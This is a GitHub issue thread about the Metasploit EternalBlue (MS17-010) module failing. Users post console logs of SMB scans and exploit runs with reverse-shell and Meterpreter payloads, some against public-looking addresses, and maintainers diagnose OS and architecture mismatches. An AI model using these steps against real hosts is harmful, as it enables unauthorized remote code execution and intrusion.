Metasploit-framework: eternalblue exploit issue

Created on 29 May 2017 · 20 Comments · Source: rapid7/metasploit-framework

msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.226.128:4444 
[*] 10.10.10.1:445 - Connecting to target for exploitation.
[+] 10.10.10.1:445 - Connection established for exploitation.
[*] 10.10.10.1:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.1:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.1:445 - Starting non-paged pool grooming
[+] 10.10.10.1:445 - Sending SMBv2 buffers
[+] 10.10.10.1:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.1:445 - Sending final SMBv2 buffers.
[*] 10.10.10.1:445 - Sending last fragment of exploit packet!
[*] 10.10.10.1:445 - Receiving response from exploit packet
[-] 10.10.10.1:445 - NoMethodError
[-] 10.10.10.1:445 - undefined method `[]' for nil:NilClass
[-] 10.10.10.1:445 - /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:293:in `smb1_get_response'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:188:in `smb_eternalblue'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:99:in `block in exploit'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.8/lib/active_support/core_ext/range/each.rb:7:in `each'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.8/lib/active_support/core_ext/range/each.rb:7:in `each_with_time_with_zone'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:95:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:430:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:392:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:205:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:48:in `<main>'
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > exit

OS

What OS are you running Metasploit on?

kali 2017


All 20 comments

Do you have any additional info on the target machine? (arch, windows version, etc.)

Same issue, on both Windows 7 enterprise build 7601 SP1 and Windows 8.1 enterprise build 9600 no SP. On launching the exploit Windows 7 throws a blue screen immediately and Windows 8 does nothing.

This should have been fixed in #8399

We can tell this example doesn't have #8399 because there is no "CORE buffer dump" for the banner string.

@mlshore we should expect the opposite behavior, i.e. 8 crashes, as we haven't put those offsets in the module yet

msf exploit(ms17_010_eternalblue) > use  auxiliary/scanner/smb/smb_ms17_010 
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_ms17_010) > set rhosts 196.***.***.***
rhosts => 196.***.***.***
msf auxiliary(smb_ms17_010) > run

[-] 196.***.***.***:445      - Host does NOT appear vulnerable.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) > set rhosts 82.***.***.***
rhosts => 82.***.***.***
msf auxiliary(smb_ms17_010) > run

[+] 82.***.***.***:445    - Host is likely VULNERABLE to MS17-010!  (Windows Server (R) 2008 Standard 6002 Service Pack 2)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 82.***.***.***
rhost => 82.***.***.***
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               82.***.***.***   yes       The target address
   RPORT               445              yes       The target port (TCP)
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.***.***.***    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.***.***.***:4444 
[*] 82.***.***.***:445 - Connecting to target for exploitation.
[+] 82.***.***.***:445 - Connection established for exploitation.
[!] 82.***.***.***:445 - Target OS selected not valid for OS indicated by SMB reply
[!] 82.***.***.***:445 - Disable VerifyTarget option to proceed manually...
[*] 82.***.***.***:445 - CORE raw buffer dump (37 bytes)
[*] 82.***.***.***:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 28  Windows Server (
[*] 82.***.***.***:445 - 0x00000010  52 29 20 32 30 30 38 20 53 74 61 6e 64 61 72 64  R) 2008 Standard
[*] 82.***.***.***:445 - 0x00000020  20 36 2e 30 00                                    6.0           
[-] 82.***.***.***:445 - Unable to continue with improper OS Target.
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.***.***.***:4444 
[*] 82.***.***.***:445 - Connecting to target for exploitation.
[+] 82.***.***.***:445 - Connection established for exploitation.
[!] 82.***.***.***:445 - Target OS selected not valid for OS indicated by SMB reply
[!] 82.***.***.***:445 - Disable VerifyTarget option to proceed manually...
[*] 82.***.***.***:445 - CORE raw buffer dump (37 bytes)
[*] 82.***.***.***:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 28  Windows Server (
[*] 82.***.***.***:445 - 0x00000010  52 29 20 32 30 30 38 20 53 74 61 6e 64 61 72 64  R) 2008 Standard
[*] 82.***.***.***:445 - 0x00000020  20 36 2e 30 00                                    6.0           
[-] 82.***.***.***:445 - Unable to continue with improper OS Target.
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > 

I hope this could help
(metasploit v4.14.22-dev)

@drimaed The target OS might be 32-bit. The module in the MSF tree right now only targets x64, as you can see from the show targets output.

@drimaed The target could possibly be 64-bit. The problem here is the kernel version is 6002, meaning it is not Server 2008 R2.

Server 2008 is based on Vista. Server 2008 R2 is Windows 7.

Vista is not currently supported.
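To make the reasoning in the comment above concrete, here is an added example (not code from the Metasploit module) that rebuilds the OS banner from the CORE raw buffer dump lines msfconsole prints and maps it to the NT kernel family the module's single target expects. The dump samples are copied from this thread with the host prefix stripped; the build-number table (6000 to 6003 for Vista/Server 2008, 7600 and 7601 for Windows 7/Server 2008 R2) is my assumption, not something the module itself does.

```ruby
# Added example, not code from the Metasploit module: rebuild the OS
# banner from the "CORE raw buffer dump" lines and apply the reasoning
# from the thread (Server 2008 = Vista kernel NT 6.0; Server 2008 R2 =
# Windows 7 kernel NT 6.1, the module's only target).

# Constructed samples copied from the thread, host prefix removed.
DUMP_2008 = <<~DUMP
  0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 28  Windows Server (
  0x00000010  52 29 20 32 30 30 38 20 53 74 61 6e 64 61 72 64  R) 2008 Standard
  0x00000020  20 36 2e 30 00                                    6.0
DUMP

DUMP_WIN7 = <<~DUMP
  0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
  0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
  0x00000020  65 20 50 61 63 6b 20 31                          e Pack 1
DUMP

# Decode the hex column only (the ASCII column is lossy: non-printable
# bytes are rendered as '.') and stop at the first NUL terminator.
def banner_from_dump(dump)
  bytes = dump.each_line.flat_map do |line|
    m = line.match(/\A\s*0x[0-9a-f]{8}\s+((?:[0-9a-f]{2}\s)+)/i)
    m ? m[1].split.map { |h| h.to_i(16) } : []
  end
  bytes.pack('C*').split("\0").first.to_s.strip
end

# NT kernel version implied by the banner. An explicit "6.0"/"6.1" wins;
# otherwise fall back to the build number. Build ranges are assumptions:
# 6000..6003 Vista / Server 2008 (RTM..SP2), 7600..7601 Windows 7 / 2008 R2.
def nt_version(banner)
  return Regexp.last_match(1) if banner =~ /\b(6\.[01])\b/
  build = banner.scan(/\b\d{4}\b/).map(&:to_i).find { |b| b >= 6000 }
  case build
  when 6000..6003 then '6.0'
  when 7600..7601 then '6.1'
  end
end

# What VerifyTarget is checking for: does the host's kernel family match
# target 0, "Windows 7 and Server 2008 R2 (x64)", i.e. NT 6.1?
def supported_by_module?(banner)
  nt_version(banner) == '6.1'
end
```

Running the 2008 dump through these functions gives NT 6.0, which is exactly why VerifyTarget refuses that host, while the Windows 7 build 7601 banner passes the OS check (the later x86/x64 arch check is separate and comes from the DCE/RPC reply).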

hey bro, how can I fix this??
let me know if you can help, thanks

msf auxiliary(smb_ms17_010) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) >

@amster699 I fixed it by wrapping your console output in ```.

sorry brother, I did not understand very well what you mean..
can you explain better?
thanks

should I also have port 4444 enabled, right?

if you can leave here the commands I should use for that, I will be very thankful, brother, thanks

closing in favor of #8835

I know this is closed, but would like to add that the architecture is wrong: the target system is 2008 Standard, and it needs to be 2008 R2.

I ask:
is it possible to run the eternalblue exploit outside our wifi?

The same issue. Pls check for me.

msf exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               172.168.22.156   yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.168.22.134   yes       The listen address (an interface may be specified)
   LPORT     445              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 172.168.22.134:445
[*] 172.168.22.156:445 - Connecting to target for exploitation.
[+] 172.168.22.156:445 - Connection established for exploitation.
[+] 172.168.22.156:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.168.22.156:445 - CORE raw buffer dump (40 bytes)
[*] 172.168.22.156:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 172.168.22.156:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 172.168.22.156:445 - 0x00000020  65 20 50 61 63 6b 20 31                          e Pack 1
[!] 172.168.22.156:445 - Target arch is x64, but server returned "x86"
[!] 172.168.22.156:445 - Target arch selected not valid for arch indicated by DCE/RPC reply
[!] 172.168.22.156:445 - Disable VerifyArch option to proceed manually...
[-] 172.168.22.156:445 - Unable to continue with improper OS Arch.
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/ms17_010_eternalblue) >

@Hugovn this issue is closed please create a new issue.

That said, the output suggests that the target is x86, not x64. Have you tried set VerifyArch false?

[!] 172.168.22.156:445 - Target arch is x64, but server returned "x86"
[!] 172.168.22.156:445 - Target arch selected not valid for arch indicated by DCE/RPC reply
[!] 172.168.22.156:445 - Disable VerifyArch option to proceed manually...
[-] 172.168.22.156:445 - Unable to continue with improper OS Arch.

hi guys, I have this problem after post-exploitation
msf exploit(ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 10.10.14.247:4445
[*] 127.0.0.1:445 - Connecting to target for exploitation.
[-] 127.0.0.1:445 - Could not make SMBv1 connection
[*] Exploit completed, but no session was created.

I met the same question. timeout

Hello guys, help!
The auxiliary scanner does not check if the target is vulnerable or not: see below

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.xx.xxx
rhosts => 192.168.xx.xxx
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       192.168.xx.xxx                                                  yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[*] 192.168.xx.xxx:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) >

455 not open

On 6 Sep 2019 14:26, "Nikhil672" notifications@github.com
wrote:

